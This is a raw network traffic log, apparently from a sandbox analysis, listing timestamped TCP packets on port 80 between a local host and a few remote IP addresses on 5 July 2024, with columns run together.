                                                                Jul 5, 2024 04:23:24.515273094 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515283108 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515305996 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515309095 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515321016 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515328884 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515332937 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515348911 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515357971 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515371084 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515379906 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515405893 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515415907 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515420914 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515441895 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515451908 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515525103 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515537024 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515546083 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515568972 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515588045 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515592098 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515603065 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515611887 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.515630007 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.515655994 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544337034 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544348001 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544357061 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544380903 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544384003 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544394970 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544404984 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544410944 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544428110 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544451952 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544466972 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544476986 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544492006 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544497967 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544502020 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544518948 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544531107 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544539928 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544593096 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544604063 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544635057 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544698000 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544708014 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544725895 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544735909 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544743061 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544748068 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544760942 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544769049 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544780970 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544800997 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544883966 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544924021 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.544934034 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544944048 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544959068 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544970036 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.544979095 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545000076 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545066118 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545075893 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545084953 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545098066 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545106888 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545115948 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545120955 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545140028 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545149088 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545159101 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545160055 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545188904 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545241117 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545252085 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545260906 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545274019 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545284033 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545295954 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545305967 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545320034 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545342922 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545372009 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545382023 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545413971 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545432091 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545444012 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545479059 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545660019 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545674086 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545686007 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545697927 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545700073 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545708895 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545720100 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545722008 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545733929 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545742035 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545746088 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545754910 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545758009 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545770884 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545778990 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545788050 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545799971 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545802116 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545814991 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545825005 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545844078 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545844078 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545856953 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545866966 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545866966 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.545876026 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545895100 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.545907974 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.546210051 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.546222925 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.546228886 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.546255112 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.546271086 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.546282053 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.546310902 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.546323061 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.546327114 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.546334982 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.546344995 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.546361923 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.546375036 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.590086937 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590106010 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590116978 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590178013 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.590200901 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590213060 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590223074 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590234041 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590245962 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590246916 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.590276003 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.590291023 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590292931 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.590302944 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590327978 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.590339899 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.590394974 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590405941 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590415001 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590425968 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.590440989 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.590457916 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.591303110 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.591315985 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.591336966 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.591348886 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.591356993 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.591362000 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.591365099 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.591377020 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.591393948 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.591412067 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.591578007 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.591620922 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604209900 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604254961 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604255915 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604265928 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604290962 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604310989 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604316950 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604327917 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604336977 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604356050 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604362011 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604368925 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604377985 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604388952 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604389906 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604398966 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604401112 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604429007 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604453087 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604475975 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604491949 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604502916 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604512930 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604520082 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604525089 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604542971 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604559898 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604585886 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604597092 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604629040 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604659081 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604669094 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604697943 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604715109 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604798079 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604806900 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604819059 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604830980 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604840994 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604847908 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604851007 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604856968 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604862928 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604866982 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604887009 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604914904 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.604923964 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604934931 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.604967117 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634321928 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634336948 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634347916 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634373903 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634388924 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634404898 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634416103 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634424925 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634435892 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634449005 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634455919 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634464025 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634468079 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634479046 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634490967 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634500980 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634510040 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634541035 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634666920 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634676933 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634686947 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634697914 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634707928 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634716988 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634718895 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634732008 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634742022 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634743929 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634749889 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634756088 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634768009 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.634777069 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634793997 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.634814978 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638298988 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638309956 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638319016 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638329983 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638340950 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638346910 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638351917 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638362885 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638365984 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638379097 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638382912 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638391018 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638402939 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638406992 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638422012 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638442993 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638556004 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638566017 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638576031 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638586998 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638602018 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638602018 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638612986 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638623953 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638626099 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638636112 CEST804975377.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:24.638637066 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638663054 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.638684988 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:24.750513077 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:24.751324892 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:24.751831055 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:24.756593943 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:24.979038954 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:24.981373072 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:25.111694098 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:25.111928940 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:25.117607117 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:25.118232012 CEST804975577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:25.118274927 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:25.118304968 CEST4975580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:25.119327068 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:25.124061108 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:25.840867043 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:25.840939999 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:25.841552973 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:25.849381924 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:26.063956022 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:26.064003944 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:26.198509932 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:26.199280024 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:26.204165936 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:26.204179049 CEST804975677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:26.204238892 CEST4975680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:26.204252005 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:26.204622984 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:26.209455967 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:26.919651985 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:26.919711113 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:26.920244932 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:26.925017118 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:27.962094069 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:27.962594986 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:27.962642908 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:27.963404894 CEST4975380192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:27.963816881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:27.963865995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:27.964034081 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:27.964075089 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:27.965378046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:27.965432882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:27.965744019 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:27.965792894 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:27.966824055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:27.966876984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:28.067156076 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:28.067459106 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:28.074110985 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:28.074197054 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:28.074341059 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:28.074493885 CEST804975977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:28.074538946 CEST4975980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:28.080920935 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:28.792445898 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:28.792608976 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:28.793112993 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:28.797837973 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:29.144792080 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:29.144956112 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:29.254645109 CEST4976180192.168.2.477.91.77.82
